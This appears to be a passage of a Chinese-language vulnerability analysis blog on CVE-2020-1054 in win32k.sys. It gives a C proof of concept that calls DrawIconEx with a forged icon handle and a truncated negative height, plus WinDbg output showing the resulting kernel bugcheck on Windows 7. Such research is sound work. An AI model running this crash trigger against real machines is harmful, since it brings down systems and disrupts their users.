// Crash PoC for CVE-2020-1054 (win32k.sys). The DrawIconEx call below makes
// the kernel fault in win32k!vStrWrite01, reached through EngStretchBlt from
// NtUserDrawIconEx (see the !analyze -v output further down); the result is a
// PAGE_FAULT_IN_NONPAGED_AREA bugcheck, i.e. a BSOD. The WinDbg figures quoted
// in this post assume exactly these argument values (see the note on the
// bitmap size below), so keep them as-is when following along in a debugger.
VOID POC_CVE_2020_1054()
{
// Return value is ignored. DrawIconEx is exported by user32 (USER32!DrawIconEx
// is the bottom frame of the stack text below).
LoadLibrary("user32.dll");
// Memory DC; per the GDI docs a NULL argument makes it compatible with the
// current screen. The returned handle is not checked for NULL before use.
HDC r0 = CreateCompatibleDC(0x0);
// CPR's original crash code called CreateCompatibleBitmap as follows
// HBITMAP r1 = CreateCompatibleBitmap(r0, 0x9f42, 0xa);
// however all following calculations/reversing in this blog will
// generally use the below call, unless stated otherwise
// this only matters if you happen to be following along with WinDbg
// Bitmap of 0x51500 x 0x100 pixels compatible with r0 (width and height are
// the int parameters of the prototype quoted right after this function).
HBITMAP r1 = CreateCompatibleBitmap(r0, 0x51500, 0x100);
// Make r1 the drawing surface of r0 so that DrawIconEx renders into it.
SelectObject(r0, r1);
// The call that triggers the bug. Two things to notice when reading it:
// (HICON)0x30000010003 is an integer cast to a handle type, not a handle
// returned by the system; and 0xfffffffffebffffc is a 64-bit literal passed
// to the 32-bit 'int cyWidth' parameter, so it is truncated to its low 32 bits
// (0xfebffffc), a negative height, while cxWidth is 0x0. The stack text below
// shows the path taken: win32k!DrawIconEx -> BltIcon -> GreStretchBltInternal
// -> EngStretchBlt -> vStrWrite01.
DrawIconEx(r0, 0x0, 0x0, (HICON)0x30000010003, 0x0, 0xfffffffffebffffc,
0x0, 0x0, 0x6);
}
// Prototype of the GDI function the PoC above uses to create the bitmap that
// is then selected into the memory DC; width and height are plain 32-bit ints.
HBITMAP CreateCompatibleBitmap(HDC hdc,
int nWidth,
int nHeight);
漏洞触发函数则是DrawIconEx，该函数用于在指定的设备上下文中绘制图标，其定义如下：
// Prototype of the function whose call triggers the fault in the PoC above.
// cxWidth and cyWidth are 32-bit ints, so the PoC's 64-bit literal
// 0xfffffffffebffffc is truncated to 0xfebffffc (a negative value) when passed
// as cyWidth; hIcon in the PoC is an integer cast to HICON rather than a handle
// returned by the system.
BOOL WINAPI DrawIconEx(HDC hdc,
int xLeft,
int yTop,
HICON hIcon,
int cxWidth,
int cyWidth,
UINT istepIfAniCur,
HBRUSH hbrFlickerFreeDraw,
UINT diFlags);
编译运行POC后，系统会产生BSOD错误，以下是部分错误信息：
0: kd> !analyze -v
Connected to Windows 7 7601 x64 target at (Tue Jul 12 10:00:11.147 2022 (UTC + 8:00)), ptr64 TRUE
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: fffff906c5000238, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff9600011218a, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 0000000000000005, (reserved)
Debugging Details:
------------------
IMAGE_NAME: win32k.sys
TRAP_FRAME: fffff88005386a40 -- (.trap 0xfffff88005386a40)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=fffff900c5000000 rbx=0000000000000000 rcx=fffff906c5000238
rdx=fffff900c06f7fa0 rsi=0000000000000000 rdi=0000000000000000
rip=fffff9600011218a rsp=fffff88005386bd0 rbp=0000000000000000
r8=0000000000000020 r9=fffff96000070000 r10=fffff88005386c30
r11=0000000000000000 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po cy
win32k!vStrWrite01+0x36a:
fffff960`0011218a 418b36 mov esi,dword ptr [r14] ds:00000000`00000000=????????
STACK_TEXT:
nt!RtlpBreakWithStatusInstruction
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x71e
nt!KeBugCheckEx+0x104
nt! ?? ::FNODOBFM::`string'+0x44891
nt!KiPageFault+0x16e
win32k!vStrWrite01+0x36a
win32k!EngStretchBltNew+0x164a
win32k!EngStretchBlt+0x797
win32k!EngStretchBltROP+0x5fe
win32k!BLTRECORD::bStretch+0x623
win32k!GreStretchBltInternal+0xa37
win32k!BltIcon+0x18f
win32k!DrawIconEx+0x3b1
win32k!NtUserDrawIconEx+0x14d
nt!KiSystemServiceCopyEnd+0x13
USER32!NtUserDrawIconEx+0xa
USER32!DrawIconEx+0xd9